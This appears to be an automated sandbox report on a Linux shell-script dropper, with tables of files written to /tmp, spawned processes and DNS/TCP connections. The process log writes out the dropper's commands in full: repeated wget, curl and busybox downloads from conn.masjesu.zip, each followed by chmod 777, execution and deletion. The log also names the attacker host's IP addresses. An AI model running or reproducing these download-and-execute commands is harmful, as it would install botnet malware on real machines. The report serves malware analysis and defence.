| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /usr/bin/curl | N/A |
Processes
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/chmod
[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/rm
[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/chmod
[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/rm
[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/chmod
[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/rm
[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/chmod
[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/rm
[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/chmod
[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T
[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/rm
[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/chmod
[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/rm
[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/chmod
[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/rm
[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/chmod
[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j
[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/rm
[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/chmod
[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV
[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/rm
[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/chmod
[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH
[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/rm
[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/chmod
[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/rm
[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/chmod
[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/rm
[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/chmod
[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/rm
[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/chmod
[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/rm
[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/chmod
[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV
[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/rm
[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/chmod
[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH
[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/rm
[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/chmod
[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/rm
[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/chmod
[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/rm
[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/chmod
[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/rm
[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/chmod
[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/rm
[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/chmod
[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/rm
[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/chmod
[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/rm
[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/chmod
[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T
[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/rm
[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/chmod
[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/rm
[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/chmod
[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/rm
[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/chmod
[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/rm
[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/chmod
[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/rm
[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/chmod
[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j
[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/rm
[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
